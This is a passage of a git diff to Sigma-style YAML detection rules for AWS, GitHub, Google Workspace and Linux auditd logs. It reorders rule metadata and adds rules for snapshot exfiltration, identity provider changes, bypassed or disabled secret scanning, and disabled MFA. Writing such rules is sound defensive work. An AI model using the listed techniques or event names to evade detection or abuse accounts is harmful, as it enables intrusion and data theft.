SecurityHub. -author: Sittikorn S -date: 2021/06/28 references: - https://docs.aws.amazon.com/cli/latest/reference/securityhub/ +author: Sittikorn S +date: 2021/06/28 tags: - attack.defense_evasion - attack.t1562 @@ -16,10 +16,10 @@ detection: selection: eventSource: securityhub.amazonaws.com eventName: - - 'BatchUpdateFindings' - - 'DeleteInsight' - - 'UpdateFindings' - - 'UpdateInsight' + - 'BatchUpdateFindings' + - 'DeleteInsight' + - 'UpdateFindings' + - 'UpdateInsight' condition: selection fields: - sourceIPAddress diff --git a/src/main/resources/rules/cloudtrail/aws_snapshot_backup_exfiltration.yml b/src/main/resources/rules/cloudtrail/aws_snapshot_backup_exfiltration.yml index 11ddcf8b4..ced4493a5 100644 --- a/src/main/resources/rules/cloudtrail/aws_snapshot_backup_exfiltration.yml +++ b/src/main/resources/rules/cloudtrail/aws_snapshot_backup_exfiltration.yml @@ -2,23 +2,22 @@ title: AWS Snapshot Backup Exfiltration id: abae8fec-57bd-4f87-aff6-6e3db989843d status: test description: Detects the modification of an EC2 snapshot's permissions to enable access from another account +references: + - https://www.justice.gov/file/1080281/download author: Darin Smith date: 2021/05/17 modified: 2021/08/19 -references: - - https://www.justice.gov/file/1080281/download - - https://attack.mitre.org/techniques/T1537/ +tags: + - attack.exfiltration + - attack.t1537 logsource: - product: aws - service: cloudtrail + product: aws + service: cloudtrail detection: - selection_source: - eventSource: ec2.amazonaws.com - eventName: ModifySnapshotAttribute - condition: selection_source + selection_source: + eventSource: ec2.amazonaws.com + eventName: ModifySnapshotAttribute + condition: selection_source falsepositives: - - Valid change to a snapshot's permissions + - Valid change to a snapshot's permissions level: medium -tags: - - attack.exfiltration - - attack.t1537 diff --git a/src/main/resources/rules/cloudtrail/aws_sso_idp_change.yml b/src/main/resources/rules/cloudtrail/aws_sso_idp_change.yml new file mode 100644 index 000000000..b299af75d --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_sso_idp_change.yml @@ -0,0 +1,32 @@ +title: AWS Identity Center Identity Provider Change +id: d3adb3ef-b7e7-4003-9092-1924c797db35 +status: experimental +description: | + Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. + A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation. +references: + - https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html + - https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html + - https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html +author: Michael McIntyre @wtfender +date: 2023/09/27 +tags: + - attack.persistence + - attack.t1556 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: + - 'sso-directory.amazonaws.com' + - 'sso.amazonaws.com' + eventName: + - 'AssociateDirectory' + - 'DisableExternalIdPConfigurationForDirectory' + - 'DisassociateDirectory' + - 'EnableExternalIdPConfigurationForDirectory' + condition: selection +falsepositives: + - Authorized changes to the AWS account's identity provider +level: high diff --git a/src/main/resources/rules/cloudtrail/aws_sts_assumerole_misuse.yml b/src/main/resources/rules/cloudtrail/aws_sts_assumerole_misuse.yml index 1f6b76ae1..bc0615dcf 100644 --- a/src/main/resources/rules/cloudtrail/aws_sts_assumerole_misuse.yml +++ b/src/main/resources/rules/cloudtrail/aws_sts_assumerole_misuse.yml @@ -1,13 +1,19 @@ title: AWS STS AssumeRole Misuse id: 905d389b-b853-46d0-9d3d-dea0d3a3cd49 +status: test description: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 -modified: 2021/08/20 references: - https://github.com/elastic/detection-rules/pull/1214 - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/10/09 +tags: + - attack.lateral_movement + - attack.privilege_escalation + - attack.t1548 + - attack.t1550 + - attack.t1550.001 logsource: product: aws service: cloudtrail @@ -16,14 +22,8 @@ detection: userIdentity.type: AssumedRole userIdentity.sessionContext.sessionIssuer.type: Role condition: selection -level: low -tags: - - attack.lateral_movement - - attack.privilege_escalation - - attack.t1548 - - attack.t1550 - - attack.t1550.001 falsepositives: - AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - Automated processes that uses Terraform may lead to false positives. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_sts_getsessiontoken_misuse.yml b/src/main/resources/rules/cloudtrail/aws_sts_getsessiontoken_misuse.yml index 340e41bc6..817c97a06 100644 --- a/src/main/resources/rules/cloudtrail/aws_sts_getsessiontoken_misuse.yml +++ b/src/main/resources/rules/cloudtrail/aws_sts_getsessiontoken_misuse.yml @@ -1,12 +1,19 @@ title: AWS STS GetSessionToken Misuse id: b45ab1d2-712f-4f01-a751-df3826969807 +status: test description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 references: - https://github.com/elastic/detection-rules/pull/1213 - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/10/09 +tags: + - attack.lateral_movement + - attack.privilege_escalation + - attack.t1548 + - attack.t1550 + - attack.t1550.001 logsource: product: aws service: cloudtrail @@ -16,12 +23,6 @@ detection: eventName: GetSessionToken userIdentity.type: IAMUser condition: selection -level: low -tags: - - attack.lateral_movement - - attack.privilege_escalation - - attack.t1548 - - attack.t1550 - - attack.t1550.001 falsepositives: -- GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_susp_saml_activity.yml b/src/main/resources/rules/cloudtrail/aws_susp_saml_activity.yml index 08eabe4ce..531596e17 100644 --- a/src/main/resources/rules/cloudtrail/aws_susp_saml_activity.yml +++ b/src/main/resources/rules/cloudtrail/aws_susp_saml_activity.yml @@ -1,24 +1,13 @@ title: AWS Suspicious SAML Activity id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e +status: test description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. -author: Austin Songer -status: experimental -date: 2021/09/22 references: - https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html -logsource: - product: aws - service: cloudtrail -detection: - selection1: - eventSource: sts.amazonaws.com - eventName: AssumeRoleWithSAML - selection2: - eventSource: iam.amazonaws.com - eventName: UpdateSAMLProvider - condition: selection1 or selection2 -level: medium +author: Austin Songer +date: 2021/09/22 +modified: 2022/12/18 tags: - attack.initial_access - attack.t1078 @@ -27,7 +16,19 @@ tags: - attack.privilege_escalation - attack.t1550 - attack.t1550.001 +logsource: + product: aws + service: cloudtrail +detection: + selection_sts: + eventSource: 'sts.amazonaws.com' + eventName: 'AssumeRoleWithSAML' + selection_iam: + eventSource: 'iam.amazonaws.com' + eventName: 'UpdateSAMLProvider' + condition: 1 of selection_* falsepositives: - - Automated processes that uses Terraform may lead to false positives. - - SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Automated processes that uses Terraform may lead to false positives. + - SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_update_login_profile.yml b/src/main/resources/rules/cloudtrail/aws_update_login_profile.yml index acaebd91d..32f2cd365 100644 --- a/src/main/resources/rules/cloudtrail/aws_update_login_profile.yml +++ b/src/main/resources/rules/cloudtrail/aws_update_login_profile.yml @@ -1,13 +1,17 @@ title: AWS User Login Profile Was Modified id: 055fb148-60f8-462d-ad16-26926ce050f1 -status: experimental +status: test description: | - An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. - With this alert, it is used to detect anyone is changing password on behalf of other users. -author: toffeebr33k -date: 2021/08/09 + An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. + With this alert, it is used to detect anyone is changing password on behalf of other users. references: - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation +author: toffeebr33k +date: 2021/08/09 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1098 logsource: product: aws service: cloudtrail @@ -26,6 +30,3 @@ fields: falsepositives: - Legit User Account Administration level: high -tags: - - attack.persistence - - attack.t1098 diff --git a/src/main/resources/rules/github/github_delete_action_invoked.yml b/src/main/resources/rules/github/github_delete_action_invoked.yml index 7b8e610ba..15a7e5e9f 100644 --- a/src/main/resources/rules/github/github_delete_action_invoked.yml +++ b/src/main/resources/rules/github/github_delete_action_invoked.yml @@ -1,8 +1,8 @@ title: Github Delete Action Invoked id: 16a71777-0b2e-4db7-9888-9d59cb75200b -status: experimental +status: test description: Detects delete action in the Github audit logs for codespaces, environment, project and repo. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/19 references: - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions @@ -22,11 +22,6 @@ detection: - 'project.delete' - 'repo.destroy' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' falsepositives: - - Validate the deletion activity is permitted. The "actor" field need to be validated. + - Validate the deletion activity is permitted. The "actor" field need to be validated. level: medium diff --git a/src/main/resources/rules/github/github_disable_high_risk_configuration.yml b/src/main/resources/rules/github/github_disable_high_risk_configuration.yml index 9a657fd34..63dde5985 100644 --- a/src/main/resources/rules/github/github_disable_high_risk_configuration.yml +++ b/src/main/resources/rules/github/github_disable_high_risk_configuration.yml @@ -1,8 +1,8 @@ title: Github High Risk Configuration Disabled id: 8622c92d-c00e-463c-b09d-fd06166f6794 -status: experimental +status: test description: Detects when a user disables a critical security feature for an organization. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/29 references: - https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization @@ -20,21 +20,11 @@ logsource: detection: selection: action: + - 'org.advanced_security_policy_selected_member_disabled' - 'org.disable_oauth_app_restrictions' - 'org.disable_two_factor_requirement' - 'repo.advanced_security_disabled' - - 'org.advanced_security_policy_selected_member_disabled' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' - - 'transport_protocol_name' - - 'repository' - - 'repo' - - 'repository_public' - - '@timestamp' falsepositives: - - Approved administrator/owner activities. + - Approved administrator/owner activities. level: high diff --git a/src/main/resources/rules/github/github_disabled_outdated_dependency_or_vulnerability.yml b/src/main/resources/rules/github/github_disabled_outdated_dependency_or_vulnerability.yml index 02052af78..a6ab69436 100644 --- a/src/main/resources/rules/github/github_disabled_outdated_dependency_or_vulnerability.yml +++ b/src/main/resources/rules/github/github_disabled_outdated_dependency_or_vulnerability.yml @@ -1,10 +1,10 @@ title: Outdated Dependency Or Vulnerability Alert Disabled id: 34e1c7d4-0cd5-419d-9f1b-1dad3f61018d -status: experimental +status: test description: | Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/27 references: - https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts @@ -19,22 +19,12 @@ logsource: detection: selection: action: - - 'dependabot_alerts.disable' - 'dependabot_alerts_new_repos.disable' - - 'dependabot_security_updates.disable' + - 'dependabot_alerts.disable' - 'dependabot_security_updates_new_repos.disable' + - 'dependabot_security_updates.disable' - 'repository_vulnerability_alerts.disable' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' - - 'transport_protocol_name' - - 'repository' - - 'repo' - - 'repository_public' - - '@timestamp' falsepositives: - Approved changes by the Organization owner. Please validate the 'actor' if authorized to make the changes. level: high diff --git a/src/main/resources/rules/github/github_new_org_member.yml b/src/main/resources/rules/github/github_new_org_member.yml index 384d64330..ac17b72bd 100644 --- a/src/main/resources/rules/github/github_new_org_member.yml +++ b/src/main/resources/rules/github/github_new_org_member.yml @@ -1,8 +1,8 @@ title: New Github Organization Member Added id: 3908d64a-3c06-4091-b503-b3a94424533b -status: experimental +status: test description: Detects when a new member is added or invited to a github organization. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/29 references: - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions @@ -19,16 +19,6 @@ detection: - 'org.add_member' - 'org.invite_member' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' - - 'transport_protocol_name' - - 'repository' - - 'repo' - - 'repository_public' - - '@timestamp' falsepositives: - - Organization approved new members + - Organization approved new members level: informational diff --git a/src/main/resources/rules/github/github_new_secret_created.yml b/src/main/resources/rules/github/github_new_secret_created.yml index 105a8b6d0..f5741c620 100644 --- a/src/main/resources/rules/github/github_new_secret_created.yml +++ b/src/main/resources/rules/github/github_new_secret_created.yml @@ -1,8 +1,8 @@ title: Github New Secret Created id: f9405037-bc97-4eb7-baba-167dad399b83 -status: experimental +status: test description: Detects when a user creates action secret for the organization, environment, codespaces or repository. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/20 references: - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions @@ -19,16 +19,11 @@ logsource: detection: selection: action: - - 'org.create_actions_secret' - - 'environment.create_actions_secret' - 'codespaces.create_an_org_secret' + - 'environment.create_actions_secret' + - 'org.create_actions_secret' - 'repo.create_actions_secret' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' falsepositives: - - This detection cloud be noisy depending on the environment. It is recommended to keep a check on the new secrets when created and validate the "actor". + - This detection cloud be noisy depending on the environment. It is recommended to keep a check on the new secrets when created and validate the "actor". level: low diff --git a/src/main/resources/rules/github/github_outside_collaborator_detected.yml b/src/main/resources/rules/github/github_outside_collaborator_detected.yml index fbd16b49e..3fa79ec55 100644 --- a/src/main/resources/rules/github/github_outside_collaborator_detected.yml +++ b/src/main/resources/rules/github/github_outside_collaborator_detected.yml @@ -1,9 +1,9 @@ title: Github Outside Collaborator Detected id: eaa9ac35-1730-441f-9587-25767bde99d7 -status: experimental +status: test description: | Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/20 references: - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions @@ -21,14 +21,9 @@ logsource: detection: selection: action: - - 'project.update_user_permission' - 'org.remove_outside_collaborator' + - 'project.update_user_permission' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' falsepositives: - Validate the actor if permitted to access the repo. - Validate the Multifactor Authentication changes. diff --git a/src/main/resources/rules/github/github_push_protection_bypass_detected.yml b/src/main/resources/rules/github/github_push_protection_bypass_detected.yml new file mode 100644 index 000000000..371e0b330 --- /dev/null +++ b/src/main/resources/rules/github/github_push_protection_bypass_detected.yml @@ -0,0 +1,23 @@ +title: Github Push Protection Bypass Detected +id: 02cf536a-cf21-4876-8842-4159c8aee3cc +status: experimental +description: Detects when a user bypasses the push protection on a secret detected by secret scanning. +references: + - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations + - https://thehackernews.com/2024/03/github-rolls-out-default-secret.html +author: Muhammad Faisal (@faisalusuf) +date: 2024/03/07 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action|contains: 'secret_scanning_push_protection.bypass' + condition: selection +falsepositives: + - Allowed administrative activities. +level: low diff --git a/src/main/resources/rules/github/github_push_protection_disabled.yml b/src/main/resources/rules/github/github_push_protection_disabled.yml new file mode 100644 index 000000000..ed6cebfa4 --- /dev/null +++ b/src/main/resources/rules/github/github_push_protection_disabled.yml @@ -0,0 +1,30 @@ +title: Github Push Protection Disabled +id: ccd55945-badd-4bae-936b-823a735d37dd +status: experimental +description: Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules. +references: + - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations + - https://thehackernews.com/2024/03/github-rolls-out-default-secret.html +author: Muhammad Faisal (@faisalusuf) +date: 2024/03/07 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action: + - 'business_secret_scanning_custom_pattern_push_protection.disabled' + - 'business_secret_scanning_push_protection.disable' + - 'business_secret_scanning_push_protection.disabled_for_new_repos' + - 'org.secret_scanning_custom_pattern_push_protection_disabled' + - 'org.secret_scanning_push_protection_disable' + - 'org.secret_scanning_push_protection_new_repos_disable' + - 'repository_secret_scanning_custom_pattern_push_protection.disabled' + condition: selection +falsepositives: + - Allowed administrative activities. +level: high diff --git a/src/main/resources/rules/github/github_secret_scanning_feature_disabled.yml b/src/main/resources/rules/github/github_secret_scanning_feature_disabled.yml new file mode 100644 index 000000000..1407a441b --- /dev/null +++ b/src/main/resources/rules/github/github_secret_scanning_feature_disabled.yml @@ -0,0 +1,26 @@ +title: Github Secret Scanning Feature Disabled +id: 3883d9a0-fd0f-440f-afbb-445a2a799bb8 +status: experimental +description: Detects if the secret scanning feature is disabled for an enterprise or repository. +references: + - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning +author: Muhammad Faisal (@faisalusuf) +date: 2024/03/07 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action: + - 'business_secret_scanning.disable' + - 'business_secret_scanning.disabled_for_new_repos' + - 'repository_secret_scanning.disable' + - 'secret_scanning.disable' + condition: selection +falsepositives: + - Allowed administrative activities. +level: high diff --git a/src/main/resources/rules/github/github_self_hosted_runner_changes_detected.yml b/src/main/resources/rules/github/github_self_hosted_runner_changes_detected.yml index 7dc420524..1c5088f65 100644 --- a/src/main/resources/rules/github/github_self_hosted_runner_changes_detected.yml +++ b/src/main/resources/rules/github/github_self_hosted_runner_changes_detected.yml @@ -1,11 +1,11 @@ title: Github Self Hosted Runner Changes Detected id: f8ed0e8f-7438-4b79-85eb-f358ef2fbebd -status: experimental +status: test description: | A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/27 references: - https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners @@ -31,23 +31,13 @@ detection: - 'org.remove_self_hosted_runner' - 'org.runner_group_created' - 'org.runner_group_removed' - - 'org.runner_group_updated' - - 'org.runner_group_runners_added' - 'org.runner_group_runner_removed' + - 'org.runner_group_runners_added' - 'org.runner_group_runners_updated' + - 'org.runner_group_updated' - 'repo.register_self_hosted_runner' - 'repo.remove_self_hosted_runner' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' - - 'transport_protocol_name' - - 'repository' - - 'repo' - - 'repository_public' - - '@timestamp' falsepositives: - Allowed self-hosted runners changes in the environment. - A self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 14 days. diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_application_access_levels_modified.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_application_access_levels_modified.yml new file mode 100644 index 000000000..9632a4d0b --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_application_access_levels_modified.yml @@ -0,0 +1,28 @@ +title: Google Workspace Application Access Level Modified +id: 22f2fb54-5312-435d-852f-7c74f81684ca +status: experimental +description: | + Detects when an access level is changed for a Google workspace application. + An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model. + An adversary would be able to remove access levels to gain easier access to Google workspace resources. +references: + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings + - https://support.google.com/a/answer/9261439 +author: Bryan Lim +date: 2024/01/12 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1098.003 +logsource: + product: gcp + service: google_workspace.admin +detection: + selection: + eventService: 'admin.googleapis.com' + eventName: 'CHANGE_APPLICATION_SETTING' + setting_name|startswith: 'ContextAwareAccess' + condition: selection +falsepositives: + - Legitimate administrative activities changing the access levels for an application +level: medium diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_application_removed.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_application_removed.yml new file mode 100644 index 000000000..bd00afe3d --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_application_removed.yml @@ -0,0 +1,26 @@ +title: Google Workspace Application Removed +id: ee2803f0-71c8-4831-b48b-a1fc57601ee4 +status: test +description: Detects when an an application is removed from Google Workspace. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST +author: Austin Songer +date: 2021/08/26 +modified: 2023/10/11 +tags: + - attack.impact +logsource: + product: gcp + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - REMOVE_APPLICATION + - REMOVE_APPLICATION_FROM_WHITELIST + condition: selection +falsepositives: + - Application being removed may be performed by a System Administrator. +level: medium diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_granted_domain_api_access.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_granted_domain_api_access.yml new file mode 100644 index 000000000..332ea09bf --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_granted_domain_api_access.yml @@ -0,0 +1,25 @@ +title: Google Workspace Granted Domain API Access +id: 04e2a23a-9b29-4a5c-be3a-3542e3f982ba +status: test +description: Detects when an API access service account is granted domain authority. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS +author: Austin Songer +date: 2021/08/23 +modified: 2023/10/11 +tags: + - attack.persistence + - attack.t1098 +logsource: + product: gcp + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: AUTHORIZE_API_CLIENT_ACCESS + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_mfa_disabled.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_mfa_disabled.yml new file mode 100644 index 000000000..14b5c94b1 --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_mfa_disabled.yml @@ -0,0 +1,28 @@ +title: Google Workspace MFA Disabled +id: 780601d1-6376-4f2a-884e-b8d45599f78c +status: test +description: Detects when multi-factor authentication (MFA) is disabled. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION +author: Austin Songer +date: 2021/08/26 +modified: 2023/10/11 +tags: + - attack.impact +logsource: + product: gcp + service: google_workspace.admin +detection: + selection_base: + eventService: admin.googleapis.com + eventName: + - ENFORCE_STRONG_AUTHENTICATION + - ALLOW_STRONG_AUTHENTICATION + selection_eventValue: + new_value: 'false' + condition: all of selection* +falsepositives: + - MFA may be disabled and performed by a system administrator. +level: medium diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml new file mode 100644 index 000000000..dd6fee807 --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml @@ -0,0 +1,27 @@ +title: Google Workspace Role Modified or Deleted +id: 6aef64e3-60c6-4782-8db3-8448759c714e +status: test +description: Detects when an a role is modified or deleted in Google Workspace. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings +author: Austin Songer +date: 2021/08/24 +modified: 2023/10/11 +tags: + - attack.impact +logsource: + product: gcp + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - DELETE_ROLE + - RENAME_ROLE + - UPDATE_ROLE + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_role_privilege_deleted.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_role_privilege_deleted.yml new file mode 100644 index 000000000..6732d34b6 --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_role_privilege_deleted.yml @@ -0,0 +1,24 @@ +title: Google Workspace Role Privilege Deleted +id: bf638ef7-4d2d-44bb-a1dc-a238252e6267 +status: test +description: Detects when an a role privilege is deleted in Google Workspace. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings +author: Austin Songer +date: 2021/08/24 +modified: 2023/10/11 +tags: + - attack.impact +logsource: + product: gcp + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: REMOVE_PRIVILEGE + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml new file mode 100644 index 000000000..321fa59ff --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml @@ -0,0 +1,26 @@ +title: Google Workspace User Granted Admin Privileges +id: 2d1b83e4-17c6-4896-a37b-29140b40a788 +status: test +description: Detects when an Google Workspace user is granted admin privileges. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE +author: Austin Songer +date: 2021/08/23 +modified: 2023/10/11 +tags: + - attack.persistence + - attack.t1098 +logsource: + product: gcp + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - GRANT_DELEGATED_ADMIN_PRIVILEGES + - GRANT_ADMIN_PRIVILEGE + condition: selection +falsepositives: + - Google Workspace admin role privileges, may be modified by system administrators. +level: medium diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml deleted file mode 100644 index adf31121e..000000000 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml +++ /dev/null @@ -1,35 +0,0 @@ -title: Edit of .bash_profile and .bashrc -id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9 -status: test -description: Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell. -author: Peter Matkovski -references: - - 'MITRE Attack technique T1156; .bash_profile and .bashrc. ' -date: 2019/05/12 -modified: 2022/02/22 -logsource: - product: linux - service: auditd -detection: - selection: - type: 'PATH' - name: - - '/root/.bashrc' - - '/root/.bash_profile' - - '/root/.profile' - - '/home/*/.bashrc' - - '/home/*/.bash_profile' - - '/home/*/.profile' - - '/etc/profile' - - '/etc/shells' - - '/etc/bashrc' - - '/etc/csh.cshrc' - - '/etc/csh.login' - condition: selection -falsepositives: - - Admin or User activity -level: medium -tags: - - attack.s0003 - - attack.persistence - - attack.t1546.004 diff 